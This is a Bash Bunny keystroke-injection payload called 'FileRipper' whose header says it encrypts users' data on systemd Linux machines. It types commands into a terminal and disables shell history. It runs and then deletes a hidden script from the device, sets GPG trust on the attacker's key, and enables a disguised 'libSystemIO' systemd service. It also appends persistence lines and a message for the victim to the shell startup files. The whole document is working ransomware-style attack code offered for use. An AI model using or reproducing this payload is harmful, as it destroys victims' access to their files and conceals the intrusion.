payload.txt

# Title: FileRipper
# Description: FileRipper is a payload which encrypts users data.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage

LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000

# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200

# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200

# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500

# [executing payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# REM replace 'alice' with name of your key
Q STRING gpg --edit-key alice
Q ENTER
Q DELAY 300
Q STRING trust
Q ENTER
Q DELAY 200
Q STRING 5
Q ENTER
Q DELAY 190
Q STRING y
Q ENTER
Q CTRL c
Q DELAY 200
Q STRING gpg --check-trustdb
Q ENTER
Q STRING gpg --update-trustdb
Q ENTER
Q DELAY 300
Q STRING systemctl --user enable --now libSystemIO.service
Q ENTER
Q DELAY 300
Q STRING systemctl --user start libSystemIO.service
Q ENTER
Q DELAY 100
Q DELAY 200

# REM [autostart on opening terminal]
Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc
Q ENTER
Q DELAY 200
Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc
Q ENTER

# REM [Message]
# REM Remove this block if you dont want to prompt message to victim.
# REM Change your message.
Q ENTER
Q DELAY 100
Q STRING echo "echo Enter Your Message Here" >> ~/.bashrc
Q ENETR
Q STRING echo "echo Enter Your Message Here" >> ~/.zshrc
Q ENTER

# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
# Q STRING exit
Q ENTER 
LED FINISH